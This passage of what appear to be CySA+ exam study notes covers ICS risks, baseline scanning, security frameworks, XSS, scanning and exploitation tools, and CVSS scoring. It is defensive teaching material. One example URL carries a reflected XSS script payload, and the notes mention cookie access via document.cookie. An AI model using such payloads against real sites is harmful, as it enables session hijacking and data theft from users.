● Downtime is unacceptable — scans or updates that cause outages can lead to physical
consequences
● Legacy systems are common — and often unpatchable
● Flat networks may exist — making lateral movement easy if breached
● Vendor restrictions may prevent traditional security tool deployment
● Real-world consequences — attacks may shut down power grids, poison water supplies, or disrupt
logistics

Examples of Relevant Threats
● Stuxnet – A cyberweapon targeting Iranian centrifuges via SCADA
● BlackEnergy – Malware used in Ukrainian power grid attacks
● TRITON/TRISIS – Targeted safety instrumented systems in industrial plants
● Ransomware – Colonial Pipeline incident disrupted U.S. fuel supply chain

25
Key Takeaway: ICS and SCADA systems live in critical infrastructure, where IT and physical
worlds converge. Standard cybersecurity approaches must be adapted for availability-first,
safety-critical environments — with extreme caution, collaboration, and respect for operational
constraints.
Security Baseline Scanning
Definition
Security baseline scanning is the process of evaluating systems, devices, or configurations against a
predefined set of security standards or benchmarks to verify compliance and identify deviations. Unlike
vulnerability scanning — which looks for software flaws or CVEs — baseline scanning checks whether
systems are configured securely according to policy.
A &quot;baseline&quot; represents the approved, expected, and hardened configuration of an asset — such as required
firewall settings, user account controls, password policies, and service permissions.
Why It Matters
Misconfigurations are one of the leading causes of security breaches. Even if software is up to date, poor
configurations can expose systems to unnecessary risk. Baseline scanning helps ensure consistency,
enforce best practices, and detect:
● Unauthorized services or open ports
● Weak password policies
● Disabled antivirus or logging
● Incorrect registry settings
● Missing group policy enforcement

This is especially important in regulated environments, large enterprise deployments, and cloud
infrastructures — where drift from baseline is common and dangerous.
Who Performs Baseline Scanning?
● System administrators define and enforce baseline configurations.
● Security teams or vulnerability managers run periodic scans to check for drift.
● Compliance officers may review scan results as part of audits or control reviews.
● Endpoint detection platforms and configuration management tools often include baseline scanning
functionality.

Real-World Analogy (Healthcare)
This is like checking vital signs and medication protocols for every patient at the start of each shift. The
baseline tells you what’s normal — and any deviation could be a sign of trouble or negligence. It’s not about
treating disease (vulnerabilities), but about ensuring consistent, safe conditions.
Baseline Scan Characteristics — Bullet Point Summary

26

● Focus: Configuration accuracy and policy compliance
● Scope: Registry settings, user privileges, services, patch enforcement, logging settings
● Standards Used:
○ CIS Benchmarks (Center for Internet Security)
○ DISA STIGs (Defense Information Systems Agency Security Technical Implementation
Guides)
○ Custom organizational policies
● Tools Used:
○ Microsoft Security Compliance Toolkit
○ OpenSCAP
○ Nessus compliance checks
○ Group Policy validation scripts
● Common Outputs:
○ Pass/Fail results per rule
○ Deviations from baseline
○ Recommendations for remediation

Key Takeaway: Security baseline scanning ensures that systems are not only vulnerable-free,
but also secure by design and consistent in operation. It’s a foundational control for
configuration management, compliance, and long-term resilience.

Industry Frameworks: Security Standards That Guide Scanning
and Hardening
Definition
Industry frameworks are standardized sets of security requirements, best practices, or benchmarks that
organizations use to measure, improve, and verify the security posture of systems, networks, and
applications. These frameworks serve as the foundation for baseline scanning, vulnerability assessments,
and compliance audits.
They define what should be secured, how it should be configured, and how often it should be assessed —
ensuring security programs are aligned with recognized industry expectations.

27

Payment Card Industry Data Security Standard (PCI DSS)
Purpose: Protect cardholder data and secure payment systems.
● Applies to any organization that stores, processes, or transmits credit card data.
● Requires quarterly external vulnerability scans by an Approved Scanning Vendor (ASV).
● Mandates internal vulnerability assessments, patch management, logging, and segmentation of
cardholder data environments.
● Includes strict controls around access, encryption, configuration, and logging.

Example: A retail company running a POS system must follow PCI DSS to avoid fines and
maintain the right to process cards. External scanning and internal hardening must be
documented and repeatable.

Center for Internet Security (CIS) Benchmarks
Purpose: Provide detailed hardening guidelines for systems and applications.
● Offers step-by-step configuration checklists for platforms like Windows, Linux, Cisco, AWS, and
more.
● Used to build security baselines for scanning and system provisioning.
● Updated regularly based on known threats, community consensus, and industry feedback.

Example: An organization may use the CIS benchmark for Windows Server 2019 to lock down
settings like audit policy, password complexity, and unused services — then use baseline
scanning to detect drift.

Open Web Application Security Project (OWASP)
Purpose: Improve software security, especially web applications.
● Maintains the famous OWASP Top 10, a ranked list of the most critical web application security risks
(e.g., injection, broken access control, XSS).
● Offers tools, testing guides, and cheat sheets for secure coding, API hardening, and threat
modeling.
● Influences dynamic application security testing (DAST), fuzzing, and secure SDLC practices.

28
Example: A development team may use the OWASP Testing Guide to build automated tests
that catch cross-site scripting (XSS) vulnerabilities before deployment.

International Organization for Standardization (ISO/IEC 27000
Series)
Purpose: Define international standards for information security management systems (ISMS).
● ISO 27001 defines how to build and maintain an ISMS — a full lifecycle approach to managing risk.
● ISO 27002 provides detailed security control guidance.
● The series influences governance, risk management, asset control, access policies, and audit
requirements.
● Certification under ISO 27001 can enhance credibility and legal defensibility.

Example: A global healthcare company uses ISO 27001 to structure its entire cybersecurity
governance framework — including vulnerability management policies and scheduled
scanning procedures.

Key Takeaway: These frameworks provide the rules and expectations that shape how organizations scan,
secure, and manage their environments. Whether technical (like CIS or OWASP) or strategic (like ISO 27001),
they ensure security is not improvised, but standards-driven and auditable.

Cross-Site Scripting (XSS)
Definition
Cross-Site Scripting (XSS) is a type of web application vulnerability that allows an attacker to inject
malicious scripts (usually JavaScript) into web pages that are then viewed by other users. The malicious
script runs in the victim’s browser as if it came from the trusted site — allowing the attacker to steal data,
hijack sessions, or manipulate content.
This occurs when user-supplied input is not properly validated, encoded, or sanitized before being included
in a web page&#39;s output.

Why It Matters
XSS is dangerous because it:
● Bypasses same-origin policy protections in browsers

29

● Can steal cookies, session tokens, or local storage data
● Allows attackers to impersonate users or administrators
● May enable keylogging, phishing, or redirection to malicious sites

It often affects login pages, comment sections, search fields, or any area where user input is reflected in the
output without proper controls.

Types of XSS
● Stored XSS: The malicious script is permanently stored on the server (e.g., in a database or forum
post) and delivered to all users who view the content.
● Reflected XSS: The malicious script is embedded in a link or request, and immediately echoed back
by the server in the response (e.g., in an error message or search result).
● DOM-Based XSS: The vulnerability exists entirely on the client side, where JavaScript dynamically
modifies the page content based on URL parameters or other inputs.

Real-World Analogy (Healthcare)
XSS is like a patient writing something dangerous on a form — and instead of the doctor reading it and
responding carefully, the note is automatically injected into the next patient’s chart. If the message includes
harmful instructions, it may be acted upon without question.

Example of Reflected XSS
Vulnerable URL:
https://example.com/search?q=&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;

If the application includes the query (q) directly in the HTML without sanitization, the script will execute when
the page loads.
Malicious Result:
● A popup appears
● Cookies can be accessed via document.cookie
● The attacker now impersonates the victim

30

How to Prevent XSS
● Input validation: Restrict the type and format of input accepted by the application
● Output encoding: Properly encode data before displaying it in HTML, JavaScript, or CSS
● Content Security Policy (CSP): Limit what scripts can run and where they can come from
● Use secure frameworks: Many modern web frameworks include XSS protections by default

Key Takeaway: XSS is one of the most common and impactful web application vulnerabilities.
It results from improper handling of user input and can lead to data theft, session hijacking, or
full user compromise — all without breaching the server itself.

Given a Scenario, Analyze Output from
Vulnerability Assessment Tools

Network Scanning and Mapping
Purpose
Network scanning and mapping tools help analysts discover what systems exist on a network, how they are
connected, and what services they expose. This forms the basis of attack surface analysis, asset inventory, and
vulnerability detection.
These tools are often used before vulnerability scanning to define scope, identify unknown systems, or spot
unauthorized devices.

Angry IP Scanner
Description
Angry IP Scanner is a fast, lightweight, open-source network scanner used to detect live hosts in an IP range. It
is primarily used for ping sweeps, port scanning, and basic host identification.
What It Shows
● Which IP addresses are active
● Open ports (e.g., 22, 80, 443) on each host

31

● Hostnames and possible MAC address information
● Exportable CSV reports for scan results

Why It’s Used
● Quick visibility into host availability and basic port exposure
● Lightweight and ideal for small environments or rapid scans
● Helps detect rogue devices or unauthorized assets

How to Analyze the Output
● Confirm expected systems are “up” and match known IPs
● Investigate any unexpected hosts responding to pings
● Flag any systems exposing sensitive ports (e.g., RDP on 3389)
● Compare results to the organization&#39;s asset inventory — anything new or mismatched could signal shadow
IT or unauthorized changes

Limitations
● No deep service fingerprinting or OS detection
● Not suitable for full vulnerability scanning — used only for discovery

Analyst Tip: Use Angry IP Scanner to validate scan scope or spot-check remote network segments.
Combine with more advanced tools (like Nmap or Nessus) for in-depth scanning.

Maltego
Description
Maltego is a link analysis and intelligence gathering tool that maps relationships between people, domains, IPs,
systems, and organizations. It is used for network mapping, open-source intelligence (OSINT), and attack
surface visualization.
What It Shows
● Entity relationships: domains, IPs, email addresses, DNS records, WHOIS data
● Graph-based maps of infrastructure
● Live data from third-party data sources (e.g., Shodan, VirusTotal, DNS records)

32

● Social engineering vectors and digital footprinting

Why It’s Used
● Visualize and explore the external footprint of an organization
● Track connections between internal and public infrastructure
● Identify entry points for attackers or weakly linked systems

How to Analyze the Output
● Review entity relationship graphs for unknown or misconfigured infrastructure
● Look for abandoned subdomains, exposed IPs, or shared services
● Use transforms to pivot from internal assets to related external entities
● Flag any systems with misaligned ownership or expired registration

Limitations
● More useful for investigation, reconnaissance, and threat modeling than traditional vulnerability
scanning
● Requires familiarity with the interface and data sources for best results

Analyst Tip: Maltego excels in early-phase investigations and threat intelligence gathering. Use it
to map what attackers might see about your organization from the outside in.

Summary
● Angry IP Scanner = Quick ping sweeps and basic host/port discovery — good for small network visibility
and rogue device detection.
● Maltego = Graph-based, external-facing mapping and OSINT — ideal for identifying attack surface,
infrastructure relationships, and digital exposure.

Key Takeaway: These tools support early-stage vulnerability management and reconnaissance,
giving analysts context before launching deeper assessments. Understanding what systems are
visible — and how they relate — is the first step toward controlling and reducing attack surface.

33

Web Application Scanners
Tools Covered:
● Burp Suite
● Zed Attack Proxy (ZAP)
● Arachni
● Nikto

Purpose
Web application scanners analyze websites and web apps for vulnerabilities in HTTP requests, input validation,
authentication flows, and client-server communication. These tools simulate attacker behavior to identify flaws
like XSS, SQL injection, CSRF, insecure cookies, and exposed directories.
Used correctly, they reveal the attack surface of web-based portals, APIs, and backend services.

Burp Suite
Description
Burp Suite is a professional-grade web vulnerability scanner and interception proxy, widely used by penetration
testers and red teamers.
Key Features
● Intercepts and modifies HTTP/HTTPS traffic between browser and server
● Scans for OWASP Top 10 vulnerabilities
● Includes intruder, repeater, decoder, and scanner tools
●
● Supports manual and automated testing

Output Analysis
● Shows vulnerable parameters, payloads, and server responses
● Flags vulnerabilities like XSS, SQLi, CSRF, and unvalidated redirects
● Provides severity ratings and remediation suggestions
● Displays exact HTTP requests/responses for each finding

34
Analyst Tip: Use the scanner module for automation, but always review findings manually using
repeater to confirm vulnerability presence and risk.

Zed Attack Proxy (ZAP)
Description
ZAP is an open-source web scanner developed by OWASP. It offers a similar feature set to Burp Suite, including
proxy-based scanning, automated spidering, and attack scripts.
Key Features
● Passive and active scanning modes
● Simple GUI with dynamic analysis
● Built-in plug-ins and scripting support

Output Analysis
● Visual traffic breakdown with alerts for XSS, injection, security misconfigurations
● Risk ratings: Low, Medium, High
● Context-aware vulnerability reports (URLs, parameters, severity, evidence)

Analyst Tip: ZAP is ideal for DevSecOps pipelines and budget-conscious teams. Use passive
mode for non-invasive assessments during development.

Arachni
Description
Arachni is a high-performance command-line web application scanner focused on speed, scalability, and
automation.
Key Features
● Extensive plugin system
● Supports JavaScript-heavy apps
● Integrates with CI pipelines
● Detects XSS, SQLi, file inclusion, unvalidated redirects, and more

Output Analysis

35

● JSON/HTML report output
● Details on affected inputs, payloads, and confidence level
● Performance metrics (scan time, request rate, error counts)

Analyst Tip: Arachni is best suited for automated scanning at scale — especially when headless
integration is required for large environments.

Nikto
Description
Nikto is a lightweight CLI-based web server scanner that tests for known vulnerabilities and misconfigurations
— not app logic issues.
Key Features
● Detects outdated server software
● Identifies default files, admin pages, insecure headers
● Simple to run, fast results

Output Analysis
● Text-based output listing each vulnerability or warning
● Flags potentially dangerous files, open directories, or SSL config issues
● Includes CVE references when applicable

Analyst Tip: Nikto is great for a first-pass check of exposed web servers before launching more
intensive scans.

Summary
● Burp Suite = Full-featured, professional-grade, powerful for both manual and automated testing
● ZAP = Open-source alternative to Burp, excellent for DevOps and training
● Arachni = Fast, scalable CLI scanner — ideal for automation
● Nikto = Lightweight, outdated software and misconfiguration detector

36
Key Takeaway: Web application scanners are critical for identifying vulnerabilities unique to web
environments. Each tool has its niche — from lightweight checks to in-depth, manual-assisted
assessments.

Burp Suite Tool Breakdown
1. Intruder
Definition:
Intruder is Burp Suite’s automated attack engine used for performing customizable payload-based attacks —
such as brute force, fuzzing, or parameter manipulation.
What It Does:
● Sends multiple requests to a target with variable payloads in designated positions (e.g., replacing a
username, session ID, or hidden field).
● Can be used to test for:
○ Weak credentials (brute force login)
○ Parameter tampering
○ Injection vulnerabilities
○ Session token predictability

Key Use Case:
Try multiple passwords or input strings against a login page or vulnerable parameter.
Analyst Tip: Great for testing input fields, cookies, headers, and any variable that could affect
backend logic.

2. Repeater
Definition:
Repeater is a manual testing tool that allows analysts to tweak and resend individual HTTP requests to observe
responses and test how a web application behaves.
What It Does:
● Takes any request (captured from proxy or manually crafted)
● Allows editing headers, parameters, cookies, or body content
● Sends the request repeatedly to compare responses

37

Key Use Case:
Test how small changes to input affect the response. For example, toggle between valid and invalid session tokens
or inject a payload into a specific field.
Analyst Tip: Repeater is ideal for verifying findings from the Scanner or Intruder — or for exploring
subtle variations in behavior during an investigation.

3. Decoder
Definition:
Decoder is a text transformation utility used to encode or decode data in common formats such as URL, Base64,
HTML, and hexadecimal.
What It Does:
● Helps interpret encoded attack payloads or web app responses
● Allows analysts to prepare or unpack obfuscated input or output
● Converts between formats for investigation or payload crafting

Key Use Case:
Decode a suspicious Base64 string returned in a cookie. Encode a script into HTML-encoded format to bypass input
filters.
Analyst Tip: Decoder is valuable for working with obfuscated malware, hidden fields, or bypass
techniques used in XSS or injection.

4. Scanner (Burp Suite Pro only)
Definition:
Scanner is the automated vulnerability detection engine that passively and actively probes web apps for flaws like
XSS, SQL injection, insecure cookies, and more.
What It Does:
● Automatically identifies OWASP Top 10 risks
● Highlights vulnerable parameters, inputs, or endpoints
● Assigns severity levels and confidence ratings
● Provides proof-of-concept payloads and fix recommendations

Key Use Case:
Run an active scan against a target application to identify exploitable inputs.

38
Analyst Tip: Use the scanner to start the vulnerability triage process, but always confirm critical
findings manually with Repeater or Intruder.

Burp Suite Tool Summary
● Intruder
○ Function: Performs automated, customizable attacks by injecting payloads into requests
○ Use Case: Brute force login attempts, fuzzing parameters, testing for injection flaws
● Repeater
○ Function: Allows manual editing and resending of individual HTTP requests
○ Use Case: Fine-tune and verify vulnerabilities; observe how input changes affect responses
● Decoder
○ Function: Encodes and decodes data in formats like Base64, URL, HTML, and hex
○ Use Case: Deobfuscate payloads or interpret encoded output from applications
● Scanner (Burp Suite Pro only)
○ Function: Automatically scans for web vulnerabilities based on known signatures and patterns
○ Use Case: Identify OWASP Top 10 vulnerabilities, insecure headers, weak session tokens
○
○
Vulnerability Scanners

Tools Covered:
● Nessus
● OpenVAS

Purpose
Vulnerability scanners are automated tools that identify security weaknesses across systems, applications, and
devices by comparing them against a database of known vulnerabilities (CVEs), misconfigurations, and policy
violations. They form the backbone of modern vulnerability management programs, providing visibility, scoring,
and remediation guidance.
These scanners are used in internal security assessments, regulatory compliance, and ongoing risk reduction
efforts.

39

Nessus

Description
Nessus is one of the most widely used commercial vulnerability scanners, developed by Tenable. It is known for its
depth, accuracy, and comprehensive plugin library.
Key Features
● Detects vulnerabilities, misconfigurations, missing patches, and insecure services
● Includes over 160,000 plugins updated continuously based on CVEs and vendor alerts
● Supports credentialed and non-credentialed scanning
● Offers compliance checks (e.g., CIS Benchmarks, DISA STIGs, PCI DSS)
● Generates detailed reports with CVSS scores and remediation steps

Use Cases
● Enterprise vulnerability scanning (internal/external)
● Patch validation and policy enforcement
● Regulatory audits (e.g., PCI, SOX, HIPAA)

Analyst Tip: Use Nessus for scheduled scans of production systems, and combine it with asset
classification to prioritize findings.

OpenVAS

Description
OpenVAS (Open Vulnerability Assessment System) is a free and open-source vulnerability scanner, maintained
by Greenbone. It is often used in environments that prioritize cost efficiency or seek open architecture.
Key Features
● Scans for known vulnerabilities across operating systems and network services
● Supports custom scan policies and task scheduling
● Provides CVSS-based scoring
● Includes a web-based interface through Greenbone Security Assistant (GSA)
● Offers vulnerability feeds, which include community-maintained definitions

40

Use Cases
● Small to mid-sized organizations
● Environments requiring open-source tooling or customization
● Educational labs or testing new vulnerability management processes

Analyst Tip: OpenVAS is a strong alternative for teams without a commercial budget — but may
require more tuning and support to match the polish of commercial tools like Nessus.

Tool Summary — Bullet Point Format
● Nessus
○ Commercial tool by Tenable
○ Highly accurate with a massive plugin database
○ Supports credentialed scans, compliance checks, and detailed CVSS reporting
○ Suitable for enterprise vulnerability management and regulatory audits
● OpenVAS
○ Open-source scanner maintained by Greenbone
○ Cost-effective and flexible
○ Offers custom policies, community-driven updates, and CVSS scoring
○ Ideal for organizations prioritizing openness, education, or low-budget scanning

Key Takeaway: Nessus and OpenVAS serve the same goal — identifying vulnerabilities before
attackers do — but differ in cost, ecosystem, and enterprise support. Nessus is favored in large-
scale, compliance-driven environments. OpenVAS shines in open-source and experimental use
cases.

Debuggers
Tools Covered:
● Immunity Debugger

41

● GNU Debugger (GDB)

Purpose
Debuggers are tools used to analyze and control the execution of software at the instruction level. While often
associated with software development, in cybersecurity they are vital for:
● Reverse engineering malware
● Discovering vulnerabilities (e.g., buffer overflows)
● Exploit development
● Behavioral analysis of suspicious executables

They allow an analyst to pause execution, examine memory, monitor registers, and trace code flow — all critical in
malware analysis, zero-day research, and advanced troubleshooting.

Immunity Debugger
Description
Immunity Debugger is a GUI-based debugger for Windows, widely used in exploit development and malware
analysis. It offers a visual interface, scripting support via Python, and tools specifically tailored for security
researchers.
Key Features
● Real-time disassembly of running processes
● Stack and heap analysis
● Built-in Python scripting API for custom automation
● Designed to work closely with shellcode, memory corruption, and exploit discovery
● Integrates with mona.py, a popular exploit development helper script

Use Cases
● Analyzing malware behavior in memory
● Inspecting payload injection techniques
● Validating shellcode execution and memory layout during buffer overflow testing

Analyst Tip: Use Immunity Debugger when working with compiled Windows malware, especially
when reverse engineering or testing exploit payloads.

42

GNU Debugger (GDB)
Description
GDB is a command-line debugger for Unix/Linux systems that allows in-depth analysis of binary execution. It is the
standard debugger for compiled applications written in C/C++ and other low-level languages.
Key Features
● Set breakpoints, step through code, inspect stack frames and variables
● Analyze segmentation faults and memory issues
● Debug both local and remote processes
● Works with core dumps and cross-platform targets

Use Cases
● Debugging Linux-based software or malware
● Analyzing crashes and undefined behavior
● Assisting in writing secure and stable C programs
● Conducting proof-of-concept development for exploit primitives

Analyst Tip: Use GDB to understand low-level memory manipulation in Linux binaries, and pair it
with tools like pwndbg for enhanced exploit-focused workflows.

Tool Summary — Bullet Point Format
● Immunity Debugger
○ GUI-based Windows debugger
○ Tailored for malware analysis and exploit development
○ Supports Python scripting and memory-focused analysis
○ Common in reverse engineering workflows involving buffer overflows
● GNU Debugger (GDB)
○ CLI-based debugger for Unix/Linux systems
○ Used for live process debugging, crash analysis, and core dump inspection
○ Supports detailed examination of program execution, memory, and registers

43

○ Essential in secure software development and exploit research on Linux

Key Takeaway: Debuggers are precision tools used to understand software behavior at the binary
level. While they are not used in day-to-day SOC monitoring, they are essential in reverse
engineering, exploit research, and advanced malware analysis.
○

Multipurpose Tools
Tools Covered:
● Nmap
● Metasploit Framework (MSF)
● Recon-ng

Purpose
Multipurpose tools support multiple phases of cybersecurity workflows, including reconnaissance, scanning,
exploitation, and post-exploitation analysis. These tools are valued for their modular design, scriptable
capabilities, and integration into both defensive and offensive security practices.
Analysts use them for network mapping, vulnerability detection, exploit validation, and threat emulation.

Nmap
Description
Nmap (Network Mapper) is a powerful, open-source network discovery and security auditing tool. It is used to
identify live hosts, scan ports, fingerprint services, and gather system metadata.
Key Features
● Host discovery (e.g., ICMP, TCP SYN, ARP)
● Port scanning and service detection
● OS fingerprinting and device identification
● Scripting engine (NSE) for advanced scanning (e.g., vulnerability checks, brute force, SSL inspection)

Use Cases

44

● Map the network prior to vulnerability scanning
● Identify unauthorized or unknown devices
● Detect open ports and exposed services
● Use NSE scripts to probe for specific vulnerabilities

Analyst Tip: Nmap’s scripting engine (e.g., nmap --script vuln) turns it into a light vulnerability
scanner. It&#39;s also a fast, reliable tool for validating scanner output or investigating anomalies.

Metasploit Framework (MSF)
Description
Metasploit Framework is an open-source penetration testing platform used to develop, test, and execute exploits
against target systems. It is also widely used in defensive settings for validating vulnerabilities and conducting
controlled simulations.
Key Features
● Huge library of exploits, payloads, and post-exploitation modules
● Integrated vulnerability scanners and auxiliary tools
● Exploit development and shellcode testing
● Meterpreter — an advanced post-exploitation payload

Use Cases
● Test whether a known vulnerability is actually exploitable
● Train red teams or simulate attacker behavior
● Confirm false positives from scanners
● Conduct internal threat emulation

Analyst Tip: MSF is not just an attacker tool — security analysts can use it to validate risk severity,
test compensating controls, or prepare for incident response scenarios.

Recon-ng
Description
Recon-ng is a web-based reconnaissance framework, often used for open-source intelligence (OSINT)

45
gathering. It automates data collection related to domains, IPs, emails, and organizations — useful for external
threat modeling and target profiling.
Key Features
● Modular interface with plug-ins (similar to Metasploit)
● Integrates with third-party APIs (e.g., Shodan, Whois, VirusTotal)
● Supports automated data harvesting and reporting

Use Cases
● Map an organization’s external digital footprint
● Identify potential phishing targets, leaked credentials, or exposed infrastructure
● Conduct passive reconnaissance prior to active scanning

Analyst Tip: Recon-ng is highly effective during the early stages of investigation, before interacting
with a target. It complements Nmap and MSF in a full-scope assessment workflow.

Tool Summary — Bullet Point Format
● Nmap
○ Purpose: Network discovery and security auditing
○ Key Uses: Host detection, port scanning, OS fingerprinting, NSE scripting
○ Role: Initial reconnaissance and lightweight vulnerability probing
● Metasploit Framework (MSF)
○ Purpose: Penetration testing and exploit validation
○ Key Uses: Launching exploits, simulating attacks, testing defenses
○ Role: Exploitation and post-exploitation validation, red team exercises
● Recon-ng
○ Purpose: Open-source intelligence gathering
○ Key Uses: Mapping external attack surface, profiling targets, passive reconnaissance
○ Role: Pre-scan threat modeling, phishing readiness, external risk analysis

46

Key Takeaway: These tools are multi-stage, modular, and widely used in real-world security
operations. Whether mapping a network (Nmap), simulating attacks (MSF), or gathering intelligence
(Recon-ng), they enable analysts to approach vulnerability management from multiple angles — not
just detection, but validation and strategy.

Cloud Infrastructure Assessment Tools
Tools Covered:
● Scout Suite
● Prowler
● Pacu

Purpose
Cloud infrastructure assessment tools are used to analyze the security posture of cloud environments such
as AWS, Azure, and Google Cloud Platform (GCP). These tools detect misconfigurations, over-permissive
roles, unsecured storage, and compliance violations that could expose cloud-based systems to attack.
They are essential in modern cybersecurity operations where hybrid and multi-cloud deployments are
common.

Scout Suite
Description
Scout Suite is an open-source, multi-cloud security auditing tool that gathers cloud resource metadata and
evaluates it against known misconfiguration patterns and best practices.
Key Features
● Supports AWS, Azure, GCP, and more
● Generates HTML reports with visual summaries
● Identifies risks in IAM roles, security groups, storage policies, encryption status
● Agentless — uses cloud provider APIs and credentials

Use Cases
● Auditing new cloud accounts for policy alignment
● Detecting overexposed S3 buckets, open ports, or unencrypted databases

47

● Checking for identity and access misconfigurations

Analyst Tip: Use Scout Suite as a read-only snapshot of cloud posture. It’s ideal for quick,
visual security reviews across multiple cloud platforms.

Prowler
Description
Prowler is a command-line AWS security and compliance tool that checks cloud configurations against CIS
Benchmarks, PCI DSS, GDPR, and other standards.
Key Features
● Focused on AWS
● Includes over 200 checks for best practices and compliance requirements
● Outputs results in JSON, CSV, and HTML
● Detects issues like MFA-disabled users, public S3 buckets, misconfigured security groups

Use Cases
● AWS environment hardening
● Compliance validation against frameworks like CIS AWS Foundations Benchmark
● Integration with DevSecOps pipelines for continuous cloud assessment

Analyst Tip: Prowler is ideal for CIS benchmark enforcement and routine compliance checks in
cloud-focused SOCs.

Pacu
Description
Pacu is an offensive cloud exploitation framework developed by Rhino Security Labs. It simulates attacker
techniques against AWS to help blue teams understand post-exploitation risks and privilege escalation
paths.
Key Features
● Simulates real-world AWS attacks (e.g., lateral movement, privilege escalation, data exfiltration)
● Modular plugin system for testing various attack vectors

48

● Supports enumeration, exploitation, and reporting
● Used in red-teaming and purple team simulations

Use Cases
● Assessing the impact of leaked AWS keys
● Testing IAM privilege escalation paths
● Simulating real-world attacker behavior in cloud environments

Analyst Tip: Pacu should be used in controlled, test cloud environments to understand how
attackers move inside AWS accounts once credentials are exposed.

Tool Summary — Bullet Point Format
● Scout Suite
○ Purpose: Multi-cloud, agentless security posture review
○ Use Case: Identify misconfigurations in IAM, storage, networking, and encryption
○ Output: Visual report for cloud security analysis (AWS, Azure, GCP)
● Prowler
○ Purpose: AWS compliance and best-practice scanning
○ Use Case: Enforce CIS benchmarks, detect misconfigurations, support audits
○ Output: Detailed findings in CSV/HTML/JSON aligned with compliance controls
● Pacu
○ Purpose: Simulate cloud-based attacks and privilege escalation
○ Use Case: Red/purple teaming, testing impact of compromised credentials
○ Output: CLI-based test modules with step-by-step attack simulation logs

Key Takeaway: As organizations migrate to the cloud, infrastructure misconfigurations
become one of the top risks. These tools help analysts proactively detect weak cloud setups,
enforce compliance, and prepare for attacker behavior — before it becomes a breach.

49

Common Vulnerability Scoring System (CVSS)
Interpretation
Purpose
The Common Vulnerability Scoring System (CVSS) provides a standardized way to rate the severity of
vulnerabilities, allowing security teams to prioritize remediation based on both exploitability and impact.
Scores range from 0.0 (no risk) to 10.0 (critical risk).
CySA+ analysts must interpret CVSS vectors to assess which vulnerabilities to address first, especially when
many are discovered at once.

CVSS Structure
The Base Score includes two main categories:
1. Exploitability Metrics – How easy is the attack?
2. Impact Metrics – What happens if it succeeds?

Exploitability Metrics
● Attack Vector (AV)
○ Describes how the attacker must access the vulnerable component.
○ Categories:
■ Network (N) – Exploitable remotely over the internet → highest risk

50

■ Adjacent (A) – Requires access to local subnet (e.g., ARP spoofing)
■ Local (L) – Requires access to the device or OS login
■ Physical (P) – Requires physical access to the machine

● Key Insight: The farther away the attacker can be, the more dangerous the vulnerability.

● Attack Complexity (AC)
○ Describes how predictable and reliable the exploit is.
○ Values:
■ Low (L) – Reliable, works every time → higher risk
■ High (H) – Requires rare conditions or extra steps (e.g., race condition)

● Key Insight: Low complexity = high attacker success rate.

● Privileges Required (PR)
○ Indicates the user role or permissions needed to exploit the vulnerability.
○ Values:
■ None (N) – No login or account needed
■ Low (L) – Basic user access needed
■ High (H) – Requires elevated/admin access
● Key Insight: No-privilege exploits are especially dangerous.

● User Interaction (UI)
○ Describes whether a victim must do something (e.g., click a link).
○ Values:
■ None (N) – Exploits automatically
■ Required (R) – User must assist the attack
● Key Insight: Attacks requiring no user action are higher risk.

● Scope (S)
○ Indicates whether the exploit can affect beyond the vulnerable component.

51

○ Values:
■ Unchanged (U) – Only affects the vulnerable system
■ Changed (C) – Can escalate to other systems or privilege domains
● Key Insight: Changed scope = potential for lateral movement or privilege escalation.

Impact Metrics
Assessed only if the exploit is successful:
● Confidentiality Impact (C)
○ Can the attacker read sensitive data?
○ Values: None / Low / High
● High = Access to secrets, PII, credentials, or financial data

● Integrity Impact (I)
○ Can the attacker modify trusted data?
○ Values: None / Low / High
● High = Unauthorized database changes, code injection, or policy overrides

● Availability Impact (A)
○ Can the attacker disrupt access to the system?
○ Values: None / Low / High
● High = Crashes, denial of service, service stoppage

Summary — Bullet Point Breakdown

52

● Attack Vector (AV)
○ Network → Highest risk
○ Local / Physical → Lower risk
● Attack Complexity (AC)
○ Low = Easy to exploit → Higher risk
○ High = Rare conditions → Lower risk
● Privileges Required (PR)
○ None = No login needed → Highest risk
○ High = Admin access needed → Lower risk
● User Interaction (UI)
○ None = Fully automatic → Higher risk
○ Required = Needs user action → Lower risk
● Scope (S)
○ Changed = Affects other systems/domains → Higher risk
○ Unchanged = Self-contained
● Confidentiality Impact (C)
○ High = Sensitive data disclosure
○ None = No data loss
● Integrity Impact (I)
○ High = Tampering with trusted data
○ None = No change
● Availability Impact (A)
○ High = Service crashes or outages
○ None = No disruption

53

Key Takeaway: CVSS is more than a number — it’s a vector of traits. Understanding each
dimension helps analysts prioritize the vulnerabilities that are most exploitable and most
damaging, especially when triaging under time pressure.
How the CVSS Scoring System Works — Bullet Point Summary
● CVSS (Common Vulnerability Scoring System) provides a numeric severity score from 0.0 to 10.0 to
describe the risk of a vulnerability.
● The score is based on eight input metrics grouped into two categories:
Exploitability Metrics (How easy is it to exploit?)
○ Attack Vector (AV) – Where must the attacker be located?
■ Values: Network, Adjacent, Local, Physical
○ Attack Complexity (AC) – How many special conditions are needed?
■ Values: Low, High
○ Privileges Required (PR) – What level of access does the attacker need?
■ Values: None, Low, High
○ User Interaction (UI) – Does the attack require a user to take action?
■ Values: None, Required

● Impact Metrics (What happens if the attack succeeds?)
○ Scope (S) – Does the attack affect other systems beyond the vulnerable one?
■ Values: Unchanged, Changed
○ Confidentiality Impact (C) – Can sensitive data be exposed?
■ Values: None, Low, High
○ Integrity Impact (I) – Can trusted data be altered?
■ Values: None, Low, High
○ Availability Impact (A) – Can system uptime be disrupted?
■ Values: None, Low, High

● Each value has a numeric weight assigned by the CVSS standard — though not always shown in
summary tables.
● Those weights are run through a scoring formula to calculate a final score from 0.0 to 10.0, broken
into severity levels:

54

○ 0.0 = None
○ 0.1–3.9 = Low
○ 4.0–6.9 = Medium
○ 7.0–8.9 = High
○ 9.0–10.0 = Critical
● Analysts use the component values to interpret risk — even without doing the math — by
recognizing which traits make a vulnerability more dangerous (e.g., remote attack + no privileges +
high data impact).
● The Base Score can be extended with Temporal and Environmental scores to reflect exploit maturity
or business impact — but these are optional and rarely required for CySA+.
Validation: True and False Positives/Negatives
Definition
Validation in vulnerability analysis is the process of determining whether a reported finding is accurate and
relevant, or whether it is the result of an error or incomplete detection. Analysts must confirm whether
vulnerabilities or alerts are:
● Real (True) or Not real (False)
● Detected (Positive) or Missed (Negative)

This forms the foundation of alert quality control, and affects everything from risk prioritization to response
time.

Core Terms and What They Mean
● True Positive (TP)
○ The tool correctly identified a real vulnerability or threat.
